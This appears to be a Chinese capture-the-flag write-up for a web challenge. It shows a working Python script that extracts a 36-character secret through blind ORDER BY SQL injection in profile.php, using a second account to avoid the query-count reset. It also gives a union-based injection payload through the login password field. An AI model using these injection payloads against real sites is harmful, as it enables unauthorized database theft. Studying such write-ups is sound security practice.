太菜了错失5k 首先扫目录发现register.php,然后注册一下,发现profile.php?id=xx,然后id=2显示hintthisissource.php,下载源码,审计。 登录和注册处发现过滤了单引号和斜杠

1
if(strlen($username) < 3 or preg_match("|'|",$username) or preg_match("|\\\\|",$username))

然后在profile.php里发现,id只过滤了. ( ) _,然后可以子查询,id=0 union select 1,2,3,4,5,然后发现2字段可显,然后钻牛角尖注了一个晚上没弄出来。

后来再看一遍源码发现

1
2
3
4
5
6
7
8
CREATE TABLE `users` (
  `id` int(5) NOT NULL AUTO_INCREMENT,
  `user` varchar(20) DEFAULT NULL,
  `pass` varchar(32) DEFAULT NULL,
  `$secret` varchar(36) DEFAULT NULL,
  `count` int(3) DEFAULT NULL,
  PRIMARY KEY (`id`)
)

$secret在第4个字段,然后经过学长提醒可以用order by 注入,顿时想起以前的博文里有个知识点。 虽然有查询次数的限制

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
if($row['count'] == 140)
        {

            if(mysql_query("update users set $secret='{$duihuanma}' where user='$username';"))
            {
                mysql_query("update users set count=0 where user='$username';");
                die("<center><br><h3>尝试次数过多,兑换码已经重置</h3></center>");
            }
            return $duihuanma;
        }

但这里的username是session里的,可以注册两个号,一个大号一个小号,拿小号的session跑大号的id,这样小号的$secret会无限重置,但大号纹丝不动。 所以上脚本

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import requests
import hashlib
import random

url = 'http://54.223.59.178/profile.php?id='
cookie = {'PHPSESSID':'03faiapvojtao8uhs323venhd4'}
string = '0123456789abcdefghijklmnopqrstuvwxyz{'

ch = 'apohnw4bjlyr62qicd5f18zexkt9vu7gm3'

for i in range(36):
    for k in range(37):
        payload = '29 union select 1,2,3,\''+ch+str(string[k])+'\',5 order by 4'
        re = requests.get(url=url+payload,cookies=cookie)
        #print(re.text)
        if 'hammer' in re.text:
            ch = ch + string[k-1]
            print(ch)
            break
    if len(ch) == 36:
        break


while 1:
    s = ''.join(random.sample('qwertyuiopasdfghjklzxcvbnm1234567890',4))
    if hashlib.md5(s.encode('utf_8')).hexdigest()[0:4] == 'ee3c':
        print(s)
        break

这个脚本不是很稳定,当跑崩的时候把最后一位删了重新跑就ok

EOF

其实还可以注password,一点过滤都没有

1
$sql = "select id,user from users where user = '$username' and pass = md5('$password')";

所以payload: username=ashdasohdia&password=1') union select d,1 from (select 1 as a,2 as b,3 as c,4 as d,5 as f from users where id = 0 union select * from users where id = 29) as a%23 username一定要xjb打,就是让它查不到 在302跳转的id里就有$secret